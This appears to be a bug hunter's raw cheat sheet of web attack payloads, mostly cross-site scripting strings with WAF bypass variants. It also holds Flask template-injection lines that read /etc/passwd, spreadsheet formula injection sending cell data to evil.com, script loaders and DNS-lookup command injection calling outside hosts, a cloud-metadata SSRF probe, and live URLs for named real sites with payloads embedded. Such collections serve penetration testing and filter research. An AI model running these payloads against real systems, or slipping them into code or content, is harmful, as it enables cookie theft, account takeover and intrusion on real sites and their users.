'"/><img/src=` onerror=alert('name')> mail'"/><img/src=` onerror=alert('name')> '"/><img/src=` onerror=alert('name')> mail'"/><img/src=` onerror=alert('name')>
<div class="mb-20 bio-area">
"></img><img src=x onerror=confirm(/Xss-By-Arafat/)>/
</textarea><ScRiPt>prompt(/920065/)</ScRiPt//
"><iframe/onload=alert(document.domain)//
"><iframe/src=javascript%26colon;[document.domain].find(alert)>
<vipin oncopy =prompt(document.domain)>
" ="" '><svg onload=setInterval`prompt\x28document.domain\x29`
{{constructor.constructor('alert(1)')()}}
<?='<SCRIPT>alert("XSS")</SCRIPT>'?>
&lt;--`</a></script></svg><img src="`" onerror="alert(1)"> --!&gt; https://bitsrc.io/
<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">
<a href=javas&#99;ript:alert(1)>
<details open ontoggle=alert(00)>
qwe<details open ontoggle=alert.apply(self,[document.domain])>qwe
'"\><img/src='1'onerror=alert(777)>{{7*7}}
javascript:x=’http://x.c’;alert(‘xss’);//
”/>&_lt;_script>alert(1)&_lt;/scr_ipt&gt”/>
<a href=javas&#99;ript:alert(1)>javascript:x=
</script><svg/onload=confirm(/yeasir/)>
"></script><svg/onload=confirm(/yeasir/)>
</ScRiPt//"><iframe/onload=alert(document.domain)//
https://github.com/streaak/keyhacks
<a"/onclick=(confirm)(1)><click here!
test<img src=x onerror=alert(document.domain) x=y
<div></svg.onload”=”confirm(domain)””/></div>
<img src=x
onerror=prompt(String.fromCharCode(47,88,83,83,80,79,83,69,68,47)) /><!--
"><img src=x Onerror="top[8680439..toString(30)](document.cookie)">
"><noscript><p title="</noscript><img src=x onerror=alert(1)>">
"><object/onerror=prompt`1`//
(A("onerror='alert`1`'testacd))/
" onfocus=alert;throw `1` autofocus>
%27-((alert))(document.cookie)-%27
test';alert(document.domain);'
test";prompt`document.domain`; var x="1
);}};prompt(document.domain);function require(test){};function lol(){switch (1){case 1:console.log(1
;<svg/onload=x>"></script><svg/onload=(confirm)(document.domain)>
xss"><!--><svg/onload=alert(1)>
"/><script>confirm(1);</script>
<svg/onload=eval(atob(‘YWxlcnQoZG9jdW1lbnQuY29va2llKQ==’))>
Bottom Exotic Payloads
test'"<svg%0aonload=((alert))(document.cookie)//
https://18.222.108.105:80/ssrf.html
" ="" '><svg onload='this["src"]="jav"+"as&Tab;cr"+"ipt:al"+"er"+"t()"';>
https://www.photoaffections.com/custom-blankets/personal-creation-p-62000?option_id=886&qty=1&paper=%27-alert(%22xss%20fired%22)-%27
https://www.photoaffections.com/custom-mugs/create-your-own-p-58377?view=%27-alert(1)-%27&qty=1
https://www.photoaffections.com/canvas-prints/create_item.php?item_id=45322013&custom_service_id=&customer_comments="><iframe/onload=alert(document.cookie)//&proof_requested=1&isAjax=true&stepedge=1
https://www.pollardwater.com/misc/ajax/getContractAndStoreOfAccount.jsp?selectedAccountId=610&selectedBranchId=POLLARDWTR%27
Php 7.1.x
?a=ls
%3Cimg src='null' onerror=alert('Xss')%3E
%3Cimg src onerror=%26emsp;prompt`${document.domain}`%3E
<svg/OnLoad="`${prompt``}`">
TE.CL
Note: To send this request using Burp Repeater, you must first go to the Repeater menu and make sure that the “Update Content-Length” option is unchecked. You need to include the trailing sequence \r\n\r\n after the final 0.
]]]
https://memn0ps.github.io/2019/09/13/HTTP-Request-Smuggling-CL-TE.html
<svg/onload=x>"></script><svg/onload=confirm(/123/)>
"onmouseover=prompt(document.domain);//
'onmouseover=prompt(document.domain);//
<x onauxclick=a=alert,a(domain)>click
<script>for((i)in(self))eval(i)(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>
<sCR<script>iPt>alert(1)</SCr</script>IPt>
<video src=1 onerror=alert(1)>
<audio src=1 onerror=alert(1)>
“<script src=//xsshere?”@email.com
“1-’or’1'=’1”@email.com
WAF BYPASS PAYLOAD+
<a%20onclick="document.write(document.cookie);">/
%3c<aa+ONLOAD+href=javasONLOADcript:promptONLOAD(1)%3e
<object/data="javascript&colon;alert/**/(document.domain)">//
"></a><object/data="javascript&colon;alert/**/(document.domain)">//
%22%3E%3Cd3v%2Fonauxclick%3D%5B2%5D.some%28confirm%29%3Eclick
constant<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>
<iframe/onload='this["src"]="jav"+"as&Tab;cr"+"ipt:al"+"er"+"t()"';>
<svg<0x0c>onload=alert(1)><svg>
'><details/open/ontoggle=confirm(document.location)>
<style/><img src="z'z</style><script/z>alert(1)</script>">
<</div>script</div>>alert()<</div>/script</div>>
<svg><b><style><img id="&lt;/style&gt;&lt;img src=1 onerror=alert(1)&gt;">
<svg%0Aonauxclick=0;[1].some(confirm)//
<svg onload\r\n=$.globalEval("al"+"ert()");>
<svg/onload=self[`aler`%2b`t`]`1`>
“><svg/on</script>load=alert`1`>
"--!><svg/onload=prompt(/1234/)>"
"xss"><!--><svg/onload=alert(document.domain)>"
<svg id=javascript:alert(10) onload=location=id>
1'"()&%<%20><ScRiPt >prompt(1)</ScRiPt>
'-`aler`%2B`t`]`1`-'
alert\\`1\\`
&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
><embed src=//14.rs>
<script src=//14.rs></script>
<script src="(https)://14.rs"></script>
"><script src=https://xssbyyeasir.xss.ht></script>
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzYnl5ZWFzaXIueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw&#61;&#61; onerror=eval(atob(this.id))>
<iframe+src%3d"http%3a//169.254.169.254/latest/user-data">xss</iframe>
X-Forwarded-For:- <a href=”attacker.com”><h1><font color=”red”>Please click here to login to your account<h1></font></a>
%2526%2Bnslookup%2Bcxx8nlugxbqajjeguq7iwpzsdbxnyfj5o-a6ssjqlda.r87.me%2526%2527%255c%2522%25600%2526nslookup%2Bcxx8nlugxbqajjeguq7iwpzsdbxnyfj5o-a6ssjqlda.r87.me%2526%2560%2527
"><img src=x onerror="document.body.innerHTML='modified';alert(document.cookie);">
<form><button formaction="javascript:alert(123)">xss<noscript></noscript></button></form>
"><d3v/onauxclick=[2].some(confirm)>click
<<scrip<scriptT>alert(1);
'"()<tbm><ScRiPt >prompt(/XSSPOSED/)</ScRiPt>
<a href="&#x3000;javascript:alert(1)">CLICKME</a>
{ 1 }; <img src=x:alert(alt) onerror=eval(src) alt='spyerror'>
{ 2 }; "></tag><svg onload=alert(spyerror)>
- x" onerror="alert(document.domain)
xss\"\u003E\u003Ch1 onmous\u0045leave=co\u006efirm(domain)\u003ECome to Me\u003C/h1\u003E\u003Cbr\u003E\u003C!--
--></title></script></iframe></style></textarea></span><svg/onload=alert(String.fromCharCode(49))>
"><object/onerror=prompt`1`//e&discount;=0JAVASCript:/*-/*`/*\`/*%27/*"/**/(/*%20*/oNcliCk=alert()%20)//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=prompt(%27openbugbounty%27)//>\x3e
"%27--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Script%20/K>(confirm)(%27OpenBugBounty%27)</Script/>
<script>alert(1)</script>’”;}) alert(1);><link/onload=alert(1)>
"'--<input type=text autofocus onfocus=(prompt)(document.domain) <!--//'></input>
<IMG SRC='vbscript:msgbox(\"XSS\")'>
&#x3C;img src=x onerror=alert(document.domain)&#x3E;TEST
<img src='1' onerror='alert(0)' <y
"><svg/onload=alert(/2/);>
<script>alert(atob("SGVyZSBpcyB0aGUgWFNT"))</script>
<script type="module">import'data:text/javascript;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ'</script>
"><frameset/onpageshow=alert(/X/)>
<input onfocus=prompt(document.domain) autofocus>"-->
"/**/autofocus/**/onfocus="alert('XSSPOSED');"
"></sCrIPt><sCRIPt>confirm(/XSs;/)</ScRiPt>
;print(md5(xss)); set|set&set
</input><input type=``text``//;valaue=`` autofocus onfocus=alert(1) a=``>
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
<script>$=1,alert($)</script>
<script ~~~>confirm(1)</script ~~~>
<script>$=1,\u0061lert($)</script>
<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
<</script/script><script ~~~>\u0061lert(1)</script ~~~>
</style></scRipt><scRipt>alert(1)</scRipt>
<img/id="alert&lpar;&#x27;XSS&#x27;&#x29;\"/alt=\"/\"src=\"/\"onerror=eval(id&#x29;>
<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>
<svg><x><script>alert&#40;&#39;1&#39;&#41</x>
<iframe src=""/srcdoc='&lt;svg onload&equals;alert&lpar;1&rpar;&gt;'>
{{7*7}}<!--#exec cmd="cat /etc/passwd" -->"><iframe/onload=alert(document.domain)//
<sVg/oNloAd=//><sVg/oNloAd=alert("XSS2")//>@gmail.com
<!%27/*!"/*!\%27/*\"/*--!><Input/Autofocus/%0D*/Onfocus=confirm`OPENBUGBOUNTY`//><Svg>
--></script><script>alert(document.domain);//
\”}})})-confirm`1`;(function(){({if(){/*///
\”}})})-confirm`1`(a=>{({b:{/*///
\”-confirm`1`//
“-prompt`1`-”//
\u0027-confirm`1`-\u0027
';alert(/OPENBUGBOUNTY/)//
'-onfocus=alert(document.domain)-'
javascript:alert(1);//
javascript:alert(document.domain)
"onmouseover="prompt(document.domain)
h/<\i<script>alert("i");</script>
"><marquee><IMG src=x onmouseover=prompt(document.domain);></marquee>
https://www.playstation.com/en-us/search/?q=" /><script>alert(1);//
'-confirm(document.domain)-'
"><img/src='1'onerror=alert(1)>
"><svg/onload=alert(domain)>
"><script>alert('xss')</script>
"><img src=x onerror=alert(domain)>@ymail.com
"><img src=x onerror=prompt(document.domain)>"
"> <img src="x" onerror="prompt(domain)"></img> Hackthegif
#"><img src=c onerror=alert(1)>/
#//><img src=x><svg/onload=confirm("Xss-By-Arafat")>/
</script><video src=x onerror=alert(document.domain)>
"></sCrIPt><sCRIPt>confirm(/XSs;/)</ScRiPt>
javascript://google.com/?%0aalert(document.domain)
&lt;img src=x onerror=prompt(999)&gt;
&#34;&#62;&#60;img/src=1 onerror=alert(1)&#62;
%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%280%29%3E
aaa">fffff</script><script>alert(document.domain)</script>aaaaa
"></title><img src=1 onerror=prompt(document.domain)>
%27%22%3E%3Cscript%3Ealert%28%27XSS%20@%20%27%2bdocument.domain%29%3C%2fscript%3E
data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+
0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg" HTTP-EQUIV="refresh" a="a >> meta tag
0;data:text/html;base64,PHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg=="HTTP-EQUIV="refresh"
0;data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"HTTP-EQUIV="refresh"
0;http://evil.com"HTTP-EQUIV="refresh"
<input type="text" value="" onmouseover="alert('XSS')">
url=google.com:/onclick='alert(document.domain)'[url=]]xss[/url]

)
javascripT://https://google.com%0aalert(1);//https://google.com
javascript://deals.razerzone.com/%E2%80%A8alert(1)//https://deals.razerzone.com
%03javascript://deals.razerzone.com/%E2%80%A8alert(1)//https://deals.razerzone.coms
%00javascript://yeasir.com/%E2%80%A8alert(document.domain)//https://yeasir.com
https://airvpn.org/external_link/?url=%03javascript://deals.razerzone.com/%E2%80%A8alert(document.domain)//https://deals.razerzone.comsdfs%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)
<?xml version="1.0"?><x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain&#x29;</x:script>
“><?xml version=”1.0" standalone=”no”?><!DOCTYPE svg PUBLIC “-//W3C//DTD SVG 1.1//EN” “http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version=”1.1" baseProfile=”full” xmlns=”http://www.w3.org/2000/svg"><polygon id=”triangle” points=”0,0 0,50 50,0" fill=”#009900" stroke=”#004400"/><script type=”text/javascript”>alert(document.location);</script></svg>
This is an outdated page. You will now be redirected to our new page"); window.location="https://google.com"//
JaVaScRiPT%0a:alert(document.cookie);/////
java%0d%0ascript%0d%0a:alert(0)
javascript:new%20Function`al\ert\`2222\``;
javascript://www.whitelisteddomain.tld?%a0alert%281%29
<form><button formaction="javascript:alert(123)">xss
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
=HYPERLINK(“http://evil.com?x=”&A3&”,”&B3&”[CR]”,”Error fetching info: Click me to resolve.”)
=cmd|'/C calc'!A0
=cmd|' /C calc'!A0
=cmd|’ /C notepad’!’A1′
;=2+5+cmd|' /C calc'!A0
=2+2
{7*7}
%{2+2}
%{%{2+2}}
{{7*7}}<!--#exec cmd="cat /etc/passwd" -->
&#x3C;img/src=&#x60;%00&#x60; onerror=this.onerror=alert(document.cooki)
<svg/on<script>load=prompt(document.domain);>”/><svg/on<script>load=prompt(document.cookie);>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">poc</a>
<b"/onauxclick='-alert(1);'>XXS
The payload will run in all contexts.
E.g.:
<input type="text" value="<b"/onauxclick='-alert(1);'>XXS">
<b"/onauxclick='-alert(2);'>XXS
yeasir"><h1><a/href="javascript&colon;alert&lpar;document&period;domain&rpar;">click_me</a>arafat_is_html_injection.....<style>h1{background-color:red;color:yellow;}
<script>
var test='<b"/onauxclick='-alert(3);'>TEST';
</script>
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
<noscript><p title="</noscript><svg/onload=alert(45)>">
<noframes><p title="</noframes><svg/onload=alert(45)>">
<iframe><p title="</iframe><svg/onload=alert(45)>">
<xmp><p title="</xmp><svg/onload=alert(45)>">
[11:48 AM, 4/12/2019] Yeasir Arafat: " onload="javascript:alert('XSS Example')
[11:49 AM, 4/12/2019] Yeasir Arafat: " onload="alert(String.fromCharCode(88,83,83))
https://google.com\'onmouseover='prompt(1)'
<div id="document.domain"><svg><style>&lt;img/src=x onerror=prompt(document.domain)// </br>//["`-->]]>]</div>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">poc</a>
<img ismap='xxx' itemtype='yyy style=width:100%;height:100%;position:fixed;left:\ 0px;top:0px; onmouseover=alert(/XSS/)//'>
"></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>
<iframe src=%22404%22 onload=%22top.frames[0].document.(%26quot;<script>r=new XMLHttpRequest();r.open('POST','https://www.facebook.com',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
<sCrIpt>alert(1)</ScRipt>
<script x>
<script x>alert('XSS')<script y>
<img src='1' onerror='alert(0)' <
String.fromCharCode(88,83,83)
http://localhost/bla.php?test=</script><script>alert(1)</script>
<html>
<script>
<?php echo 'foo="text '.$_GET['test'].'";'; ?>
</script>
</html>
Bypass quotes in mousedown event
<a href="" onmousedown="var name = '&#39;;alert(1)//'; alert('smthg')">Link</a>
<script>window['alert'](document['domain'])<script>
alert`1`
Bypass onxxxx= blacklist
<object onafterscriptexecute=confirm(0)>
<object onbeforescriptexecute=confirm(0)>
<img src='1' onerror\x00=alert(0) />
<img src='1' onerror\x0b=alert(0) />
<img src='1' onerror/=alert(0) />
<img/src='1'/onerror=alert(0)>
<div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
<script>
foo="text </script><script>alert(1)</script>";
</script>
#JS/URL polyglot
data:text/html;alert(1)/*,<svg%20onload=eval(unescape(location))><title>*/;alert(2);function%20text(){};function%20html(){}
#WASM
https://vulnerabledoma.in/polyglot/wasmjscsshtml.html
#BlindXSS
'">*/--></title></style></textarea></script%0A><img src=x onerror=confirm(1)>
#xss
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
#xss2
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
#xss3
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> 
#sqli
SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/
https://medium.com/@arbazhussain/stored-xss-on-rockstar-game-c008ec18d071
Rules >
http://h1.nobbd.de/
http://bugbountyworld.com/
https://medium.com/@phwd
https://whitton.io/
https://medium.com/@arbazhussain/10-rules-of-bug-bounty-65082473ab8c
Facebook>>
https://web.facebook.com/notes/phwd/facebook-bug-bounties-the-unofficial-treasure-map/1020506894706001?_rdc=1&_rdr
https://medium.com/@rajsek/my-3rd-facebook-bounty-hat-trick-chennai-tcs-er-name-listed-in-facebook-hall-of-fame-47f57f2a4f71
PostMessage-XSS:
<body onload="hack()"><script> function hack(){ window.parent.postMessage( {"location":null, "text":null, "html": null, "base64": null}, "*"); }</script></body>
https://challenge.intigriti.io/#data:text/html;alert(document.domain);base64,PGJvZHkgb25sb2FkPSJoYWNrKCkiPjxzY3JpcHQ+IGZ1bmN0aW9uIGhhY2soKXsgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSggeyJsb2NhdGlvbiI6bnVsbCwgInRleHQiOm51bGwsICJodG1sIjogbnVsbCwgImJhc2U2NCI6IG51bGx9LCAiKiIpOyB9PC9zY3JpcHQ+PC9ib2R5Pg
https://challenge.intigriti.io/?#data:text/html;lol=alert(document.domain)//;base64,PHNjcmlwdD5zZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cGFyZW50LnBvc3RNZXNzYWdlKHsidGV4dCI6IDEsICJodG1sIjogMiwgImJhc2U2NCI6IDN9LCAiKiIpO30sIDE1MDApPC9zY3JpcHQ+ICAg
&
</script><script>alert(document.domain)</script>
"'--!></Iframe><Iframe /SrcDoc=%26lt;Svg/O%26%23x6Eload%26equals;confirm%26lpar;1%26rpar;%26gt;>#
eeee<%2fscript><script>prompt(/XSS/.source)<%2fscript>yyyy
<!'/*"/*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>#
%3C!%27/*%22/*\%27/*\%22/*--%3E%3C/Script/%3E%3CScript%3Econfirm(document.domain)%3C/Script/%3E#
<--`<img/src=` onerror=alert(1)> --!>
<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
<div style="position:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)" onclick="alert(1)">x</button>
<form><button formaction=javascript&colon;alert(1)>CLICKME
<SCRIPT>alert();</SCRIPT>"><<SCRIPT>alert();</SCRIPT>img src=x onerror=alert(1);><SCRIPT>alert();</SCRIPT>
<SCRIPT>alert();</SCRIPT>"><<SCRIPT></SCRIPT>img src=x onerror=alert(1);><SCRIPT>alert();</SCRIPT>
&lt;--`</a></script></svg><img src="`" onerror="alert(1)"> --!&gt;
</x></svg><iframe src="" srcdoc="&lt;svg onload=alert(15)&gt;">{{7*7}}
<script src="data:text/javascript,alert(1)"></script>
<a onmouseover="alert(document.cookie)">xxs link</a>
<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
#<iframe src=javascript:alert(document.domain) />
><marquee onstart=alert(1233)>test
alert(document.getElementsByName(%22SAMLResponse%22)[0].defaultValue);//
"><h1><a/href="javascript&colon;alert&lpar;document&period;domain&rpar;">click_me</a>this_is_html_injection.....<style>h1{background-color:red;color:yellow;}
"><iframe/onload=aaaaajavascript&colon;alert&lpar;document&period;domain&rpar;>
></span><p onmouseover='p=~[];p={___:++p,$$$$:(![]+"")[p],__$:++p,$_$_:(![]+"")[p],_$_:++p,$_$$:({}+"")[p],$$_$:(p[p]+"")[p],_$$:++p,$$$_:(!""+"")[p],$__:++p,$_$:++p,$$__:({}+"")[p],$$_:++p,$$$:++p,$___:++p,$__$:++p};p.$_=(p.$_=p+"")[p.$_$]+(p._$=p.$_[p.__$])+(p.$$=(p.$+"")[p.__$])+((!p)+"")[p._$$]+(p.__=p.$_[p.$$_])+(p.$=(!""+"")[p.__$])+(p._=(!""+"")[p._$_])+p.$_[p.$_$]+p.__+p._$+p.$;p.$$=p.$+(!""+"")[p._$$]+p.__+p._+p.$+p.$$;p.$=(p.___)[p.$_][p.$_];p.$(p.$(p.$$+"\""+p.$_$_+(![]+"")[p._$_]+p.$$$_+"\\"+p.__$+p.$$_+p._$_+p.__+"(\\\"\\"+p.__$+p.__$+p.___+p.$$$_+(![]+"")[p._$_]+(![]+"")[p._$_]+p._$+",\\"+p.$__+p.___+"\\"+p.__$+p.__$+p._$_+p.$_$_+"\\"+p.__$+p.$$_+p.$$_+p.$_$_+"\\"+p.__$+p._$_+p._$$+p.$$__+"\\"+p.__$+p.$$_+p._$_+"\\"+p.__$+p.$_$+p.__$+"\\"+p.__$+p.$$_+p.___+p.__+"\\\"\\"+p.$__+p.___+")"+"\"")())();'>
XSS<svg/onload="eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41));">
</title><svg onload="&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000100&#0000111&#0000099&#0000117&#0000109&#0000101&#0000110&#0000116&#0000046&#0000100&#0000111&#0000109&#0000097&#0000105&#0000110&#0000041">
XSS<img src='a'/onerror='eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41,59));'/>
<var onmouseover="prompt(document.cookie)">x275</var>
https://vulnerabilities.in/blog/
https://medium.com/@ozguralp/simple-remote-code-execution-vulnerability-examples-for-beginners-985867878311
https://medium.com/@mohdaltaf163/uploading-backdoor-for-fun-and-profit-rce-db-cred-p1-2cdaa00e2125
https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
cat+/etc/passwd
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"><defs><font id="x"><font-face font-family="y"/></font></defs></svg>
Cloudflare WAF Bypass
<img src=x onError=import('//1152848220/')>
<img src=x onError=import('//3627734734/')>
http://3627734734
teste"><javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>/*click me!#*/alert(document.domain)
teste"><javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>/*click me!#*/confirm`1`
testtest<a%20href="javascript&colon;alert(document.domain)">testtest
Akamai WAF Bypass
<x onauxclick=import('//1152848220/')>click
Mod_Security WAF Bypass
<x onauxclick=import('//1152848220/')>click
<img src=x onError=import('//1152848220/')>
<uu src=@'@' onbigclick=import('//0a"&nbsp;"0a0a?0a/')>mou%09se<|/uu>:}
<svg/OnLoad="`${prompt``}`">
Imperva WAF XSS Bypass:
<sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//</div">
<svg onload="alert(1)" <="" svg=""
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://github.com/cure53/H5SC/tree/master/attachments
https://130.211.16.246/www/EasyToBuy/ShareOfVoice?retailer='-onfocus=alert(document.domain)-'
https://130.211.16.246/www/LearnFromTheShoppersVoice/ShoppersVoiceRetailerData?retailer=
https://130.211.16.246/www/LearnFromTheShoppersVoice/ShoppersVoiceProductsData?category=&header=Top%205%20Competitors&label='-confirm(1)-'
?a=`+alert(document.domain);//&x=%22oncut=%22eval(%27`%27%2bURL)'
Python Flask SSTI Payloads and tricks
* {{url_for.__globals__}}
* {{request.environ}}
* {{config}}
* {{url_for.__globals__.__builtins__.open('/etc/passwd').read()}}
* {{self}}
* request|attr('__class__') == request.__class__ == request[\x5f\x5fclass\x5f\x5f]
<img src="x" onerror="document.write(window.location)" />
<img src="echopwn" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
https://memberssl.auction.co.kr/Common/CustomizedVerification/VerifyIdentityByCellphone.aspx?nrequestseq=132421452&calltype=U&nexturl=javascript:confirm(1);//%3freferType%3d%26url%3dhttps%253a%252f%252fmemberssl.auction.co.kr%252fFP%252fBabyPlus%252fSignupBabyPlus.aspx%26RequestSeqNo%3diac132421452%26callPageType%3dU%26certType%3dZ&cancelurl=javascript:confirm(1);//%3freferType%3d%26url%3dhttps%253a%252f%252fmemberssl.auction.co.kr%252fFP%252fBabyPlus%252fSignupBabyPlus.aspx&refertype=&ispossiblecreditauth=Y
https://memberssl.auction.co.kr/Common/popup/VerifyIpinPopup.aspx?mtype=I&ctype=U&next=javascript:confirm(1);//
https://memberssl.auction.co.kr/Common/popup/VerifyIpinPopup.aspx?mtype=I&ctype=U&next=https%3a%2f%2fmemberssl.auction.co.kr%2fCommon%2fVerifyMainResult.aspx%3freferType%3d%26url%3djavascript:confirm(1);//
</div>